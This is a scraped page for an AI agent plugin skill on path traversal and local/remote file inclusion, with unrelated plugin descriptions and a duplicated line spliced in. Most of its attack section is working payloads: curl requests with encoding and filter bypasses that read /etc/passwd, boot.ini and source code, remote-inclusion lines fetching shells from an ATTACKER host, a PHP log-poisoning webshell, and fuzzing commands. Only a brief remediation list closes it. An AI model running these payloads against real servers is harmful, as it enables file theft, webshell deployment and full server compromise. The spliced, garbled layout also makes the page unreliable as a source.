From meta
Exploit path traversal and local/remote file inclusion (LFI/RFI) via URL parameters, cookies, and hidden fields using ../ sequences, URL encoding (%2e%2e%2f), double encoding (%252e%252e%255c), Unicode bypasses (..%c0%af), and Windows UNC paths. PHP include/require with $_GET/$_POST/$_COOKIE pattern. Target /etc/passwd, boot.ini, web.config. Tools: DotDotPwn, WFuzz, Burp Suite, ZAP.
npx claudepluginhub securityfortech/hacking-skills --plugin metaThis skill uses the workspace's default tool permissions.
Applications that construct file paths from user-supplied input without proper canonicalization
Guides Next.js Cache Components and Partial Prerendering (PPR) with cacheComponents enabled. Implements 'use cache', cacheLife(), cacheTag(), revalidateTag(), static/dynamic optimization, and cache debugging.
Guides building MCP servers enabling LLMs to interact with external services via tools. Covers best practices, TypeScript/Node (MCP SDK), Python (FastMCP).
Generates original PNG/PDF visual art via design philosophy manifestos for posters, graphics, and static designs on user request.
Applications that construct file paths from user-supplied input without proper canonicalization
and boundary enforcement allow attackers to escape the intended directory. On Linux/Unix, this
enables reading /etc/passwd, SSH keys, application configuration files, and source code. On
Windows, boot.ini, win.ini, and SAM hive files become accessible. Remote File Inclusion (RFI)
extends the impact to arbitrary code execution by loading attacker-controlled URLs as server-side
scripts. Inadequate sanitization — including blacklisting only specific sequences — is routinely
bypassed through encoding variants.
file=, path=, item=, page=, template=, home=, style=, lang=TEMPLATE=flower or PSTYLE=GreenDotRed containing file references(include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)../ sequences against each candidate parameter; observe
response differences (size, content, error messages).....//, spaces, extra periods, backslash mixing)./etc/passwd) and Windows targets (../../boot.ini,
../../windows/win.ini).http://, https://, ftp://, file://
prefixes for remote inclusion.php://filter, php://input, data://),
log poisoning, and session file inclusion chains.# Basic traversal — Unix
curl "https://TARGET/getUserProfile.jsp?item=../../../../etc/passwd"
curl "https://TARGET/index.php?file=../../../etc/passwd"
# Basic traversal — Windows
curl "https://TARGET/index.asp?file=..\..\..\..\boot.ini"
curl "https://TARGET/index.asp?file=../../../../windows/win.ini"
# URL encoding bypass
curl "https://TARGET/index.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd"
# ../ = %2e%2e%2f
# Double URL encoding bypass
curl "https://TARGET/index.php?file=%252e%252e%255cetc%255cpasswd"
# Unicode/UTF-8 bypass
curl "https://TARGET/index.php?file=..%c0%afetc%c0%afpasswd"
curl "https://TARGET/index.php?file=..%c1%9cwindows%c1%9cwin.ini"
# Sanitization bypass — nested sequences (defeats Replace("../",""))
curl "https://TARGET/index.php?file=....//....//etc/passwd"
curl "https://TARGET/index.php?file=....\\....\\boot.ini"
# Windows UNC path
curl "https://TARGET/index.php?file=\\\\ATTACKER\\share\\malicious.txt"
# Remote file inclusion
curl "https://TARGET/index.php?file=http://ATTACKER/shell.txt"
curl "https://TARGET/index.php?file=ftp://ATTACKER/shell.txt"
# PHP filter wrapper (LFI — read source base64 encoded)
curl "https://TARGET/index.php?file=php://filter/convert.base64-encode/resource=index.php"
# Cookie-based traversal
curl "https://TARGET/page" -H "Cookie: PSTYLE=../../../../etc/passwd"
# DotDotPwn automated scan
dotdotpwn -m http -h TARGET -f /etc/passwd -k "root:" -d 6
# WFuzz path traversal fuzz
wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/Traversal.txt \
"https://TARGET/index.php?file=FUZZ"
../../../etc/passwd%00.jpg — truncates extension check (PHP < 5.3.4)... /, ..%20/, .... — confuse regex-based filters...\/ or ..\\/ — bypass OS-specific separator checks./etc/passwd.php://filter, data://text/plain;base64,..., expect://id.Scenario 1 — Read /etc/passwd via URL Parameter
Setup: https://TARGET/getUserProfile.jsp?item=ikki.html serves profile content from disk.
Trigger: Change item=../../../../etc/passwd; server returns passwd file content in response.
Impact: Username enumeration, identification of service accounts, OSINT for further attacks.
Scenario 2 — LFI via Cookie to Code Execution (Log Poisoning)
Setup: LFI confirmed via TEMPLATE cookie; application logs User-Agent to a predictable path.
Trigger: Send request with User-Agent: <?php system($_GET['cmd']); ?> to poison the log file;
then include log via LFI with cmd=id.
Impact: Remote code execution on the server.
Scenario 3 — RFI for Webshell Deployment
Setup: PHP include($_GET['page']) without allow_url_fopen=Off.
Trigger: page=http://ATTACKER/webshell.txt — attacker hosts a PHP webshell as .txt to bypass
extension checks; server fetches and executes it.
Impact: Full server compromise via interactive webshell.
file= may reference an internal enum or database key, not an actual
filesystem path; confirm by observing whether traversal sequences produce different responses.../ in a URL fragment that appears in logs but is normalized by the framework before reaching
application code is not exploitable.realpath() (PHP) or equivalent; verify the resolved path starts
within the allowed base directory before opening.allow_url_include and allow_url_fopen in PHP configuration.., %, \, / sequences in file-referencing parameters.Path traversal is an [[authz-bypass]] on the filesystem — the attacker escapes an intended directory boundary in the same way a session swap escapes a user boundary. When LFI chains to RCE via log poisoning, the code execution primitive is identical to [[cmd-injection]]. If the traversal target is a URL rather than a file path, look at [[ssrf]] for how server-side URL fetching can reach internal resources. In mobile apps, [[mobile-platform-interaction]] covers path traversal via Content Provider URIs.